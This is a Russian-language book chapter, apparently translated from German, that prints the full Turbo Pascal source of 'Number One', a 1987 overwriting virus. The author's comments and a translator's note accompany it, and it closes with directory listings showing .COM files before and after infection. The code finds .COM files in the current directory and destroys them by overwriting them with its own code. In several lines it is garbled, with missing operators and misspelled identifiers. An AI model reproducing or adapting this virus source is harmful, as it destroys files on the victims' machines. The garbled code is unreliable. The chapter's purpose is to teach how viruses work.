Вирусы на Паскале




Язык высокого уровня Паскаль, а особенно Турбо-Паскаль, в
силу своей близости к машинному языку предоставляет отличные
возможности для написания программ-вирусов. Правда, недостатком
его является то, что компилятор Паскаля не берет файлы длиной
менее 12 Кбайт. Но поскольку для целей отладки размер программы
значения не имеет, Турбо-Паскаль вполне пригоден для того, чтобы
уяснить принципиальную структуру вирусов.
В качестве примера здесь приводится перезаписвающая програм-
ма-вирус на Паскале. Эти коды время от времени пересылались через
различные "почтовые ящики". Здесь программа публикуется в своей
первоначальной форме с комментариями, составленными ее автором М.
Валленом.

{
-----------------------------------------------------------------

Number One

This is a very primitiv computer virus.

HANDLE WITH CARE! ----------- demonstration ONLY!

Number One infect all.COM-file in the CURRENT directory.
A warning message and the infected file's name will be displayed.
That file has been overwritten with Number One's programm
code and is not reconstructable!
If all file s are infected or no .COM-files found, Number
One gives you a .
Files may be protected against infections of Number One by
setting the READ ONLY attribute.
Written 10.3.1987 by M.Vallen (Turbo-Pascal 3.01a)
(c) 1987 by BrainLab
---------------------------------------------------------------------
}
{C-}
{U-}
{I-} { Do not allow an user Break, enable 10 check}
{--Constants----------------------------------------------------}
Const
VirusSize = 12027; { Number One's code size }
Warning : String [42] { Warning massage }
= 'This file has been infected by Number One's;

{--Type declaration----------------------------------------------}
Type
DTARec = Record { Date area for }
DOSnext : Array 1...21 of Byte; { file search }
Attr : Byte;
FTime,
FDate,
FLsize,
FHsize : Integer;
FullName : Array 1...13 of Char;
End;
Registers = Record {Register set useed for file search}
Case Byte of
1: ( AX, BX, CX, DX, BP, SI, DI, DS, ES,Flags: Integer);
2: ( AL, AH, BL, BH, CL, CH, DL, DH : Byte);
End;
{--Variables------------------------------------------------------}
Var
ProgramStart : Byte absolute Cseg: $180; {Memory offset of program code}
{Infection marker}

MarkInfected : String 42 absolute Cseg: $180;
Reg : Register; { Register set}
DTA : DTARec; { Date area}

Buffer :Array [Byte] of Byte; { Date buffer}
TestID : String 42; {To recognize infected files}
UsePath : String 66; { Path to search files}
{Length of search path}
UsePathLength: Byte absolute UsePath;
Go : File; { File to infect}
B : Byte; { Used }

--Program code-------------------------------------------------------

Begin
WriteLn(Warning); {Display Warning massage}
GetDir(0,UsePath); { Get current directory}

if Post ('', UsePath ) <> UsePathLengt then
UsePath:= UsePath + '';
UsePath:= UsePath + '*.COM'; { Define search mask}
Reg.AH := $1A; { Set date area}
Reg.DS Seg(DTA);
Reg.DX Ofs(DTA);
MsDos(Reg);
UsePath Succ(UsePathLength):=0; Path must end with =0
Reg.AH := $4e;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath 1);
Reg.CX :=$ff; {Set attribut to find ALL files}
MsDos(Reg); { Find the first matching entry}
If not Odd(Reg.Flags) Then { If a file found then...}
Repeat
UsePath:=DTA.FullName;
B := Pos(#0,UsePath);
If B> 0 Then
Delete (UsePath,B,255); { Remove garbage}
Assign(Go, UsePath);
Reset(GO);
If IOresult=0 {If not error then}
Begin
BlockRead(Go,Buffer,2);
Move(Buffer $80,TestID, 43);
{Test if file is already infected}
If TestID<> Warning then { If not, then}
Begin
Seek(Go,0);
{Mark file as infected and...}
MarkInfected:= Warning;
{ Infected it}
BlockWrite(Go,PrograStart,Succ(VirusSize shr 7));
Close(Go);
{ Say what has been done}
WriteLn(UsePath +' infected.');
Halt; {... and HALT the program}
End;
Close(Go);
End;
{The file has already been infected, search next}
Reg.AH:=$4F;
Reg.DS Seg(DTA);
Reg.DX Ofs(DTA);
MsDos(Reg)
{... Until no more files found}
Until Odd(Reg.Flags);
Write(''); { Give a smile}
End.

Примечение переводчика. Комментарии к данной программе,
видимо, не нуждаются в переводе, а потому далее приводится лишь
перевод "шапки" программы:

(Это весьма примитивный компьютерный вирус.
ОБРАЩАТЬСЯ С ОСТОРОЖНОСТЬЮ! --- Только для демонстрации!
Number One внедряется во все СОМ-файлы каталога CURRENT!
Сообщения пользователю и имена инфицированных файлов выдаю-
тся на дисплей.
Инфицированные файлы перезаписываются кодами программы
Number One и не могут быть восстановлены!
Если все файлы заражены или если СОМ-файлов не найдено,
программа выдаст Вам "улыбку".
Файлы можно защитить от проникновения вируса путем установки
атрибута "только чтение".)

Характеристики программы

Этот перезаписывающий вирус ведет себя так же, как и описан-
ный в разделе 10.1. Правда, он не оказывает никакого действия на
EXE-файлы. Кроме того, эта программа не так эффективна, посколь-
ку, во-первых, имеет длину около 12 Кбайт и, во-вторых, изменяет
записи даты создания файлов. К тому же вирус не может преодолеть
атрибут "только чтение".
Каталог перед вызовом программы-вируса:

Katalog von A:\

DEBUG COM 15611 4-22-85 12:00p
DISKCOM COM 4121 4-22-85 12:00p
DISKCOPY COM 4425 4-22-85 12:00p
3 Dateien 330752 Bytes frei
Каталог после вызова программы примет следующий вид:

Katalog von A:\

DEBUG COM 15611 7-13-87 8:06p
DISKCOM COM 4121 4-22-85 12:00p
DISKCOPY COM 4425 4-22-85 12:00p
3 Dateien 330752 Bytes frei
Тот, кто обратил внимание на эти записи, сразу уже заметить
изменение в указании даты создания файлов. Изменения еще более
заметны, если вызвать самый короткий файл.

Katalog von A:\

DEBUG COM 15611 7-13-87 8:06p
DISKCOM COM 12032 7-13-87 8:09p
DISKCOPY COM 4425 4-22-85 12:00p
3 Dateien 32584 Bytes frei

Правда, при полном заражении запоминающей среды это не кара-
ется дефектными секторами. Вирус просто сигнализирует об этом
"улыбкой".